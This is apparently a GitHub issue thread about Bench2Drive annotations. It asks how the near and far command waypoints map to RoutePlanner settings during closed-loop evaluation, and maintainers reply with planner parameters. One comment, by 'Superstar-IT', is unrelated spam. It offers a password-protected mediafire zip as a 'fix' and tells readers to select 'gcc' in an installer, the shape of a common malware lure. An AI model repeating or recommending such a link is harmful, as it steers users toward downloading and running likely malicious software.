### ISSUE TITLE
How to obtain x/y_command_near and x/y_command_far during evaluation?

### ISSUE THREAD

**Issue by huangzehao** [Thinklab-SJTU/Bench2DriveZoo#34]
Dear Bench2Drive Developers,
The annotations in the Bench2Drive dataset provide the following items:
```
- x_command_far  # farther waypoint x in world coordinates
- y_command_far  # farther waypoint y in world coordinates
- command_far    # the command to farther waypoint
- x_command_near # nearby waypoint x in world coordinates
- y_command_near # nearby waypoint y in world coordinates
- command_near   # the command to nearby waypoint
```
I am wondering how to obtain these items in the agent. I can only find the definition of near_node and near_command in the agent code (https://github.com/Thinklab-SJTU/Bench2DriveZoo/blob/uniad/vad/team_code/uniad_b2d_agent.py#L289). When checking the location of near_node during closed-loop evaluation, I noticed that the distance between the ego vehicle and near_node is larger than the distance between the ego vehicle and x/y_command_near in the annotations. Can I consider that the near_node in the agent code is actually equivalent to x/y_command_far in the annotations?

The motivation behind my question is that I want to use the target_point information when training the agent. However, I'm unsure which item from the annotations I should use to ensure consistency with the information available during evaluation.

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jayyoung0802** [comment]
you can set custom RoutePlanner. 
For data collect, we use
`RoutePlanner(4.0, 50, lat_ref=self.lat_ref, lon_ref=self.lon_ref)  # near`
`RoutePlanner(7.5, 25.0, lat_ref=self.lat_ref, lon_ref=self.lon_ref)  # far`

**Comment by huangzehao** [comment]
Thanks for your quick reply! What about the value of `sample_factor` when calling `downsample_route` in `set_global_plan`? I notice the value of `sample_factor` will affect the value of `near_node`. According to the code here https://github.com/Thinklab-SJTU/Bench2Drive/blob/main/leaderboard/leaderboard/autoagents/autonomous_agent.py#L132, it is set to 50. But I am not sure the value used during data collect is also 50.

**Comment by jiaxiaosong1002** [comment]
@huangzehao This is our agent: https://github.com/Thinklab-SJTU/Bench2Drive/blob/main/tools/data_collect.py

**Comment by huangzehao** [comment]
thanks.

**Comment by YanhaoWu** [comment]
我也注意到了这个问题，在agent中使用
RoutePlanner(4.0, 50, lat_ref=self.lat_ref, lon_ref=self.lon_ref)  # near
RoutePlanner(7.5, 25.0, lat_ref=self.lat_ref, lon_ref=self.lon_ref)  # far
却获得了相同的导航点，这与训练集中不一致。是否有解决方案？

**Comment by jzhzhang** [comment]
@YanhaoWu Hi, I encountered the same issue. I found that the near node is unexpectedly larger than the needed node collected in the training data.

Have you resolved this issue?
